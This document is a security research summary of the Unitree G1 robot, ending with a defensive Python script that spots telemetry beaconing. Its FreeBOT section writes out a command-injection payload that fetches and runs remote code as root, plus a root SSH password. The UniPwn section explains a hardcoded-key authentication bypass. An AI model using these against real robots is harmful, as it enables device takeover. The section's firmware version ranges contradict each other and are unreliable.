# Cybersecurity of the Unitree G1 — Detailed Findings

**Sources:** arXiv:2509.14096, arXiv:2509.14139, UniPwn (GitHub: Bin4ry/UniPwn), FreeBOT (theroboverse.com)
**Fetched:** 2026-02-13
**Type:** Security Research — Aggregated Findings

---

## Locomotion Computer Hardware

- **Processor:** Rockchip RK3588 (8-core ARM Cortex-A76/A55)
- **RAM:** 8GB LPDDR4X
- **Storage:** 32GB eMMC
- **Kernel:** Linux 5.10.176-rt86+ (real-time patched)
- **Network:** eth0 at 192.168.123.161/24, wlan0 at 192.168.8.193/24

## Software Architecture

- `master_service` orchestrator (9.2 MB binary) supervises 26 daemons
- `ai_sport` — primary locomotion/balance policy (145% CPU, 135 MB RAM)
- `state_estimator` — sensor fusion (~30% CPU)
- `motion_switcher` — gait mode management
- `robot_state_service`, `dex3_service_l/r`, `webrtc_bridge`, `ros_bridge`
- Configuration files encrypted with **FMX format**: Blowfish-ECB + LCG stream cipher with static keys (partially reverse-engineered)
- Unix socket: `/unitree/var/run/master_service.sock`

## Known Vulnerabilities

### UniPwn BLE Exploit (Bin4ry, Sep 2025)

- Affects: G1, H1, R1, Go2, B2
- Hardcoded AES encryption keys identical across ALL Unitree robots
- Authentication: encrypt the string "unitree" with the known key → passes
- SSID/password fields passed to `system()` with root privileges
- **Wormable:** an infected robot can scan BLE and compromise other Unitree robots
- GitHub: Bin4ry/UniPwn

### FreeBOT Jailbreak (TheRoboVerse)

- Command injection via the WiFi password field in the mobile app
- Payload: `;curl -L 4jb.me|sh;#`
- Works on firmware 1.3.0-1.6.0
- SSH after jailbreak: root:theroboverse
- Patched in firmware 1.1.8+ (October 2025)

### Known CVEs on RK3588

- CVE-2023-52660, CVE-2025-38081, CVE-2024-57256

## Telemetry (Data Exfiltration)

- Robot phones home every ~5 minutes via MQTT (port 17883)
- Data sent: audio, video, LiDAR, GPS, robot state
- Destination IPs: 43.175.228.18, 43.175.229.18, 8.222.78.102
- Mitigation: block outbound traffic at the network firewall, or isolate the robot network from the internet

## Open Services on 192.168.123.161

- DDS/Iceoryx: UDP 7400
- WebRTC signal server: port 8081
- MQTT: port 17883 (outbound to telemetry servers)

## Key Conclusion

Root access to the RK3588 is achievable via BLE exploits. However, nobody has publicly documented replacing `ai_sport` (the stock locomotion policy) with a custom binary, or extracting the RL policy weights from it. The FMX-encrypted configuration files and the `master_service` orchestrator remain barriers. All research groups deploy custom policies from external computers via DDS.
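To verify the telemetry mitigation in the section above (rather than trust that the firewall rule works), a defender can check egress flow logs for connections from the robot to the documented telemetry servers on the MQTT port and confirm the ~5-minute beacon interval. The following is an added example, not code from the cited research; the flow-log line format and the sample lines are constructed, and the destination IPs, port and robot address are taken from the findings above.

```python
"""Detect Unitree G1 telemetry beaconing in egress flow logs (added example)."""
from collections import defaultdict
from datetime import datetime
import re

# Telemetry destinations and MQTT port as documented in the findings above.
TELEMETRY_IPS = {"43.175.228.18", "43.175.229.18", "8.222.78.102"}
MQTT_PORT = 17883
ROBOT_IP = "192.168.8.193"  # wlan0 address from the hardware section

# Constructed sample flow lines (not real captures): "time src:sport -> dst:dport proto".
SAMPLE_FLOWS = """\
2026-02-13T10:00:02 192.168.8.193:41022 -> 43.175.228.18:17883 tcp
2026-02-13T10:01:10 192.168.8.193:41030 -> 93.184.216.34:443 tcp
2026-02-13T10:05:01 192.168.8.193:41045 -> 43.175.228.18:17883 tcp
2026-02-13T10:10:03 192.168.8.193:41061 -> 43.175.229.18:17883 tcp
2026-02-13T10:15:00 192.168.8.193:41077 -> 8.222.78.102:17883 tcp
"""

LINE_RE = re.compile(r"^(\S+) (\S+):(\d+) -> (\S+):(\d+) (\w+)$")

def parse_flows(text):
    """Parse flow lines into (timestamp, src, dst, dport) tuples; skip malformed lines."""
    flows = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue
        ts, src, _sport, dst, dport, _proto = m.groups()
        flows.append((datetime.fromisoformat(ts), src, dst, int(dport)))
    return flows

def find_telemetry(flows):
    """Return flows that hit a documented telemetry destination on the MQTT port."""
    return [f for f in flows if f[2] in TELEMETRY_IPS and f[3] == MQTT_PORT]

def beacon_interval(flows):
    """Median gap in seconds between consecutive telemetry connections, per source IP."""
    by_src = defaultdict(list)
    for ts, src, _dst, _dport in flows:
        by_src[src].append(ts)
    result = {}
    for src, times in by_src.items():
        times.sort()
        gaps = sorted((b - a).total_seconds() for a, b in zip(times, times[1:]))
        result[src] = gaps[len(gaps) // 2] if gaps else None
    return result

if __name__ == "__main__":
    hits = find_telemetry(parse_flows(SAMPLE_FLOWS))
    for ts, src, dst, dport in hits:
        print(f"{ts} {src} -> {dst}:{dport}")
    print("median beacon gap (s):", beacon_interval(hits))
```

A non-empty result after the egress block is in place means the rule is not effective; a median gap near 300 s on the robot's address matches the phone-home cadence reported above.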